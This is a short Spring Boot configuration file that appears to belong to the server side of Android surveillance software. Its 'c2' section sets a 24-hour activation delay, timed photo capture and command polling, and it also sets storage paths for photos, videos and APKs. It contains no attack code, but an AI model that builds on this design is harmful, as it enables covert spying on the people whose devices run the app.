server:
  port: ${PORT:8080}

spring:
  datasource:
    url: ${DATABASE_URL}
    username: ${DATABASE_USERNAME}
    password: ${DATABASE_PASSWORD}
    driver-class-name: org.postgresql.Driver

  jpa:
    hibernate:
      ddl-auto: update
    show-sql: false
    database-platform: org.hibernate.dialect.PostgreSQLDialect

  servlet:
    multipart:
      max-file-size: 50MB
      max-request-size: 200MB

app:
  storage:
    video-path: ./videos
    photo-path: ./photos
    apk-path: ./apk
  c2:
    activation-delay-hours: 24
    photo-interval-seconds: 300
    poll-interval-seconds: 30
